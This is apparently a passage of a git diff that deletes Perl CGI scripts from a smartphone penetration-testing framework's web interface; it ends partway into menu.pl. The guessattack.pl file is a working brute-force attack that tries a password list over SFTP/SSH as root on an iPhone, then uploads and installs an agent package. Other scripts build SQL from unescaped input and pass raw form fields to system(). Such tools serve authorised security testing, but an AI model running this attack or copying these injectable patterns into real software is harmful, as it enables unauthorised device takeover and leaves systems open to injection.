- $selectquery2 = "SELECT controlkey from agents where number=" . "\'" . $agent . "\'";
- $selectquery3 = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
-
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT path from agents where number=" . $agent;
- $selectquery2 = "SELECT controlkey from agents where number=" . $agent;
- $selectquery3 = "SELECT id from modems where number=" . $modemNo;
-
-
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path = @rows[0];
- $sql = $dbh->prepare($selectquery2);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key = @rows[0];
-if ($returnmethod eq "SMS")
- {
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " " . "SMSS" . " " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- if ($deliverymethod eq "HTTP")
- {
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
- }
- if ($deliverymethod eq "SMS")
- {
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
-
-
- }
- if ($returnmethod eq "HTTP")
- {
- if ($deliverymethod eq "HTTP")
- {
- $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
- if ($deliverymethod eq "SMS")
- {
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
-}
-}
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
-
44 frameworkgui/guessPassword.pl
@@ -1,44 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$ipAddress = $FORM{"ipAddressTB"};
-$passwordFile = $FORM{"passwordFileTB"};
-
-
-##----- put your code here
- $startcommand = "perl guessattack.pl " . $ipAddress . " " . $passwordFile;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
-
- system($startcommand);
-
-
- }
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
96 frameworkgui/guessattack.pl
@@ -1,96 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-use Expect;
-
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-$ipaddress = $ARGV[0];
-$passfile = $ARGV[1];
- $vulnerable = "no";
- $agent = "no";
- $command = 'sftp';
- $param = "root@" . $ipaddress;
- $timeout = 10;
- $notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
- $passwordstring = $parm . "'s password: ";
- $location = $Variables{"IPHONEAGENT"};
- $putfile = $location;
- $connectstring = "Connecting to " . $ipaddress . "...";
- $installcommand = "dpkg -i " . "iphone.deb" . "\n";
- $guesspassword = "null";
- open(READFILE, "+<$passfile");
- while(<READFILE>)
- {
- $guess = $_;
- $guess2 = $guess . "\n";
- $exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
- $exp->expect($timeout,[$connectstring]);
- $exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
- $exp->expect($timeout, $passwordstring);
- $exp->send($guess2);
- if ($exp->expect($timeout, ["sftp>"]))
- {
- $vulnerable="yes";
- $guesspassword = $guess;
- $exp->send("put $putfile\n");
- $exp->expect($timeout, ["sftp>"]);
- $exp->send("bye\n");
- $command2 = "ssh";
- $exp = Expect->spawn($command2, $param);
- $exp->expect($timeout, $passwordstring);
- $exp->send($guess2);
- $exp->expect($timeout, [qr'root\s*']);
- $exp->send($installcommand);
- $exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
- $exp->send("tooltest\n");
- if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
- {
- $agent="yes";
- }
- $exp->send("exit");
- $exp->soft_close();
- last;
- }
- }
- $table = "remote";
- $guessstring = "Guess: " . $guesspassword;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $ip2 = "\'" . $ipaddress . "\'";
- $vulnerable2 = "\'" . $vulnerable . "\'";
- $agent2 = "\'" . $agent . "\'";
- $exploit = "\'" . $guessstring . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $ip2 = "\"" . $ipaddress . "\"";
- $vulnerable2 = "\"" . $vulnerable . "\"";
- $agent2 = "\"" . $agent . "\"";
- $exploit = "\"" . $guessstring . "\"";
- }
- $insertquery = "INSERT INTO $table (id,ip,exploit,vuln,agent) VALUES (DEFAULT,$ip2,$exploit,$vulnerable2,$agent2)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
-
-
-
BIN frameworkgui/iphone.deb
Binary file not shown.
BIN frameworkgui/littleBulb.jpg
Deleted file not rendered
560 frameworkgui/menu.pl
@@ -1,560 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-$dir = getcwd;
-$configfile = $dir . "/config";
- open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
</